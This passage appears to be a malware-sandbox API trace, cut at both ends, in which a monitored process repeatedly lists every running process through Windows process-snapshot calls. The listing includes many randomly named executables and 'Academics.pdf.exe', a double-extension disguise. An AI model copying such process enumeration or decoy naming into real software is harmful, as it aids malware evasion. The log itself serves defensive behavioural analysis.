lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.624] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.625] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.626] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.627] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.628] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0285.629] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.630] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.636] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.637] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.638] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.639] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.640] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.640] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.641] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.642] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0285.643] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.644] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0285.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0285.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0285.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0285.647] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0285.648] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0285.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0285.650] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0285.651] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0285.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0285.653] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0285.654] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0285.654] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0285.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0285.656] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0285.657] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0285.658] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0285.659] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0285.660] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0285.661] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.665] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.665] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0285.666] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.667] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0285.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0285.669] CloseHandle (hObject=0x294) returned 1 [0285.669] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.669] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0285.671] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.673] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.673] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.674] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.675] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.676] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.677] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.678] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0285.679] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0285.680] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.681] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.683] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.684] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.685] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.686] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.686] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.687] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.688] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0285.689] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0285.690] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0285.691] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0285.692] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0285.693] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0285.693] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0285.694] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0285.695] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0285.696] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0285.697] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0285.701] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0285.702] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0285.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0285.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0285.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0285.706] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0285.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0285.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 